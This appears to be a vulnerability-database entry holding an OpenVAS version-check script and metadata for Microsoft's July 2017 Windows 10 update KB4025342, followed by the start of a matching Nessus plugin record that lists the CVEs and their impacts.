Microsoft Windows Multiple Vulnerabilities (KB4025342)
2017-07-12T00:00:00
ID OPENVAS:1361412562310811465 Type openvas Reporter Copyright (C) 2017 Greenbone Networks GmbH Modified 2020-06-04T00:00:00
Description
This host is missing a critical security
update according to Microsoft KB4025342
###############################################################################
# OpenVAS Vulnerability Test
#
# Microsoft Windows Multiple Vulnerabilities (KB4025342)
#
# Authors:
# Kashinath T <tkashinath@secpod.com>
#
# Copyright:
# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.811465");
script_version("2020-06-04T12:11:49+0000");
script_cve_id("CVE-2017-8596", "CVE-2017-8598", "CVE-2017-8599", "CVE-2017-8601",
"CVE-2017-8602", "CVE-2017-8603", "CVE-2017-8604", "CVE-2017-0170",
"CVE-2017-8463", "CVE-2017-8605", "CVE-2017-8606", "CVE-2017-8607",
"CVE-2017-8467", "CVE-2017-8486", "CVE-2017-8608", "CVE-2017-8609",
"CVE-2017-8610", "CVE-2017-8611", "CVE-2017-8617", "CVE-2017-8618",
"CVE-2017-8619", "CVE-2017-8495", "CVE-2017-8556", "CVE-2017-8557",
"CVE-2017-8561", "CVE-2017-8562", "CVE-2017-8563", "CVE-2017-8564",
"CVE-2017-8565", "CVE-2017-8566", "CVE-2017-8573", "CVE-2017-8574",
"CVE-2017-8577", "CVE-2017-8578", "CVE-2017-8580", "CVE-2017-8581",
"CVE-2017-8582", "CVE-2017-8585", "CVE-2017-8588", "CVE-2017-8589",
"CVE-2017-8590", "CVE-2017-8592");
script_bugtraq_id(99405, 99417, 99393, 99420, 99390, 99406, 99407, 99389, 99388,
99408, 99410, 99409, 99414, 99412, 99418, 99415, 99391, 99422,
99399, 99392, 99424, 99439, 99398, 99426, 99397, 99402, 99428,
99394, 99404, 99431, 99438, 99416, 99419, 99421, 99423, 99429,
99432, 99400, 99425, 99427, 99396);
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"last_modification", value:"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)");
script_tag(name:"creation_date", value:"2017-07-12 10:08:33 +0530 (Wed, 12 Jul 2017)");
script_name("Microsoft Windows Multiple Vulnerabilities (KB4025342)");
script_tag(name:"summary", value:"This host is missing a critical security
update according to Microsoft KB4025342");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"Multiple flaw exists due to,
- Microsoft Windows fails to properly handle objects in memory.
- The way that the Scripting Engine renders when handling objects in memory
in Microsoft browsers.
- The way JavaScript engines render when handling objects in memory in
Microsoft browsers.
- The way Microsoft Edge handles objects in memory.
- When Windows Explorer improperly handles executable files and shares during
rename operations.
- when an affected Microsoft browser does not properly parse HTTP content.
- when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).
- When Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as
the default authentication protocol.
- The way that the Windows Kernel handles objects in memory.
- The Microsoft Graphics Component fails to properly handle
objects in memory.");
script_tag(name:"impact", value:"Successful exploitation will allow an attacker
who successfully exploited the vulnerability to gain the same user rights as
the current user, run arbitrary code, processes with elevated privileges.
Also could take control of the affected system and cause a denial of service.");
script_tag(name:"affected", value:"Microsoft Windows 10 Version 1703 x32/x64.");
script_tag(name:"solution", value:"The vendor has released updates. Please see the references for more information.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"executable_version");
script_xref(name:"URL", value:"https://support.microsoft.com/en-us/help/4025342");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
script_family("Windows : Microsoft Bulletins");
script_dependencies("smb_reg_service_pack.nasl");
script_require_ports(139, 445);
script_mandatory_keys("SMB/WindowsVersion");
exit(0);
}
include("smb_nt.inc");
include("secpod_reg.inc");
include("version_func.inc");
include("secpod_smb_func.inc");
if(hotfix_check_sp(win10:1, win10x64:1) <= 0){
exit(0);
}
sysPath = smb_get_system32root();
if(!sysPath ){
exit(0);
}
edgeVer = fetch_file_version(sysPath:sysPath, file_name:"edgehtml.dll");
if(!edgeVer){
exit(0);
}
if(version_in_range(version:edgeVer, test_version:"11.0.15063.0", test_version2:"11.0.15063.482"))
{
report = 'File checked: ' + sysPath + "\Edgehtml.dll" + '\n' +
'File version: ' + edgeVer + '\n' +
'Vulnerable range: 11.0.15063.0 - 11.0.15063.482\n' ;
security_message(data:report);
exit(0);
}
exit(0);
{"id": "OPENVAS:1361412562310811465", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025342)", "description": "This host is missing a critical security\n update according to Microsoft KB4025342", "published": "2017-07-12T00:00:00", "modified": "2020-06-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811465", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-us/help/4025342"], "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8617", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "lastseen": "2020-06-08T23:26:07", "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS17_JUL_4025338.NASL", "SMB_NT_MS17_JUL_INTERNET_EXPLORER.NASL", "SMB_NT_MS17_JUL_4025344.NASL", "SMB_NT_MS17_JUL_4025342.NASL", "SMB_NT_MS17_JUL_4025341.NASL", "SMB_NT_MS17_JUL_WIN2008.NASL", "SMB_NT_MS17_JUL_4025336.NASL", "SMB_NT_MS17_JUL_4025339.NASL", "SMB_NT_MS17_JUL_WIN2012.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811456", "OPENVAS:1361412562310811224", "OPENVAS:1361412562310811516", "OPENVAS:1361412562310811464", "OPENVAS:1361412562310811519", "OPENVAS:1361412562310811517", "OPENVAS:1361412562310811515", "OPENVAS:1361412562310811518", "OPENVAS:1361412562310811461"]}, {"type": "kaspersky", "idList": ["KLA11070", "KLA11900", "KLA11067"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7FDC117533451294884ABE03F31ED36B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D"]}, {"type": "cve", "idList": ["CVE-2017-8463", "CVE-2017-8588", "CVE-2017-8599", "CVE-2017-8556", "CVE-2017-8486", "CVE-2017-8604", "CVE-2017-8561", "CVE-2017-8603", "CVE-2017-8585", "CVE-2017-8581"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1C37EC4D058873085167AA48C6A7233A"]}, {"type": "symantec", "idList": ["SMNTC-99406", "SMNTC-99389", "SMNTC-99404", "SMNTC-99426", "SMNTC-99424", "SMNTC-99391", "SMNTC-99400", "SMNTC-99427", "SMNTC-99397", "SMNTC-99393"]}, {"type": "seebug", "idList": ["SSV:96315"]}, {"type": "mskb", "idList": ["KB4025342"]}], "modified": "2020-06-08T23:26:07", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2020-06-08T23:26:07", "rev": 2}, "vulnersScore": 7.8}, "pluginID": "1361412562310811465", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025342)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811465\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8596\", \"CVE-2017-8598\", \"CVE-2017-8599\", \"CVE-2017-8601\",\n \"CVE-2017-8602\", \"CVE-2017-8603\", \"CVE-2017-8604\", \"CVE-2017-0170\",\n \"CVE-2017-8463\", \"CVE-2017-8605\", \"CVE-2017-8606\", \"CVE-2017-8607\",\n \"CVE-2017-8467\", \"CVE-2017-8486\", \"CVE-2017-8608\", \"CVE-2017-8609\",\n \"CVE-2017-8610\", \"CVE-2017-8611\", \"CVE-2017-8617\", \"CVE-2017-8618\",\n \"CVE-2017-8619\", \"CVE-2017-8495\", \"CVE-2017-8556\", \"CVE-2017-8557\",\n \"CVE-2017-8561\", \"CVE-2017-8562\", \"CVE-2017-8563\", \"CVE-2017-8564\",\n \"CVE-2017-8565\", \"CVE-2017-8566\", \"CVE-2017-8573\", \"CVE-2017-8574\",\n \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\",\n \"CVE-2017-8582\", \"CVE-2017-8585\", \"CVE-2017-8588\", \"CVE-2017-8589\",\n \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99405, 99417, 99393, 99420, 99390, 99406, 99407, 99389, 99388,\n 99408, 99410, 99409, 99414, 99412, 99418, 99415, 99391, 99422,\n 99399, 99392, 99424, 99439, 99398, 99426, 99397, 99402, 99428,\n 99394, 99404, 99431, 99438, 99416, 99419, 99421, 99423, 99429,\n 99432, 99400, 99425, 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 10:08:33 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025342)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025342\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft Windows fails to properly handle objects in memory.\n\n - The way that the Scripting Engine renders when handling objects in memory\n in Microsoft browsers.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - The way Microsoft Edge handles objects in memory.\n\n - When Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - when an affected Microsoft browser does not properly parse HTTP content.\n\n - when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - When Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as\n the default authentication protocol.\n\n - The way that the Windows Kernel handles objects in memory.\n\n - The Microsoft Graphics Component fails to properly handle\n objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability to gain the same user rights as\n the current user, run arbitrary code, processes with elevated privileges.\n Also could take control of the affected system and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025342\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.482\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.482\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "naslFamily": "Windows : Microsoft Bulletins"}
{"nessus": [{"lastseen": "2020-08-19T05:12:43", "description": "The remote Windows 10 version 1703 host is missing security update\nKB4025342. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8574,\n CVE-2017-8577, CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows Input Method Editor (IME) due to improper\n handling of parameters in a method of a DCOM class. A\n local attacker can exploit this, via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8566)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8596)\n\n - Multiple remote code execution vulnerability exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8598, CVE-2017-8603, CVE-2017-8604,\n CVE-2017-8605, CVE-2017-8610, CVE-2017-8619)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8617)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. (CVE-2017-8618)", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "KB4025342: Windows 10 Version 1703 July 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8617", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2017-07-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUL_4025342.NASL", "href": "https://www.tenable.com/plugins/nessus/101368", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101368);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8566\",\n \"CVE-2017-8573\",\n \"CVE-2017-8574\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8585\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8596\",\n \"CVE-2017-8598\",\n \"CVE-2017-8599\",\n \"CVE-2017-8601\",\n \"CVE-2017-8602\",\n \"CVE-2017-8603\",\n \"CVE-2017-8604\",\n \"CVE-2017-8605\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8609\",\n \"CVE-2017-8610\",\n \"CVE-2017-8611\",\n \"CVE-2017-8617\",\n \"CVE-2017-8618\",\n \"CVE-2017-8619\"\n );\n script_bugtraq_id(\n 99387,\n 99388,\n 99389,\n 99390,\n 99391,\n 99392,\n 99393,\n 99394,\n 99396,\n 99397,\n 99398,\n 99399,\n 99400,\n 99402,\n 99404,\n 99405,\n 99406,\n 99407,\n 99408,\n 99409,\n 99410,\n 99412,\n 99414,\n 99415,\n 99416,\n 99417,\n 99418,\n 99419,\n 99420,\n 99421,\n 99422,\n 99423,\n 99424,\n 99425,\n 99426,\n 99427,\n 99428,\n 99429,\n 99431,\n 99432,\n 99438,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025342\");\n script_xref(name:\"MSFT\", value:\"MS17-4025342\");\n\n script_name(english:\"KB4025342: Windows 10 Version 1703 July 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4025342. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8574,\n CVE-2017-8577, CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows Input Method Editor (IME) due to improper\n handling of parameters in a method of a DCOM class. A\n local attacker can exploit this, via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8566)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. 